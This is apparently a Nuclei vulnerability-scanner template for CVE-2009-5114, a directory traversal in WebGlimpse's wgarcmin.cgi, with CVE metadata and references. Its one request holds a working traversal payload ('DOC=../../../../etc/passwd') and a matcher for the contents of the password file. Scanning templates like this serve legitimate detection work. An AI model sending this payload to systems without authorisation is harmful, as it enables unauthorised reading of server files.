45 lines
1.6 KiB
YAML
45 lines
1.6 KiB
YAML
id: CVE-2009-5114
|
|
|
|
info:
|
|
name: WebGlimpse 2.18.7 - Directory Traversal
|
|
author: daffainfo
|
|
severity: medium
|
|
description: A directory traversal vulnerability in wgarcmin.cgi in WebGlimpse 2.18.7 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the DOC parameter.
|
|
impact: |
|
|
An attacker can view, modify, or delete sensitive files on the server, potentially leading to unauthorized access or data leakage.
|
|
remediation: Apply all relevant security patches and product upgrades.
|
|
reference:
|
|
- https://www.exploit-db.com/exploits/36994
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2009-5114
|
|
- http://websecurity.com.ua/2628/
|
|
- https://exchange.xforce.ibmcloud.com/vulnerabilities/74321
|
|
- https://github.com/ARPSyndicate/kenzer-templates
|
|
classification:
|
|
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
|
|
cvss-score: 5
|
|
cve-id: CVE-2009-5114
|
|
cwe-id: CWE-22
|
|
epss-score: 0.01077
|
|
epss-percentile: 0.84241
|
|
cpe: cpe:2.3:a:iwork:webglimpse:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: iwork
|
|
product: webglimpse
|
|
tags: cve,cve2009,edb,lfi,iwork
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/wgarcmin.cgi?NEXTPAGE=D&ID=1&DOC=../../../../etc/passwd"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: regex
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4a0a00473045022100cd47a2863b26749712c2a6dc10751c67722890228bfe2e440cbb5f791ff845a7022064315ce0626de27f7d31105d98aa58879aef1c16969e08b6d35c45bc2b11e8ed:922c64590222798bb761d5b6d8e72950 |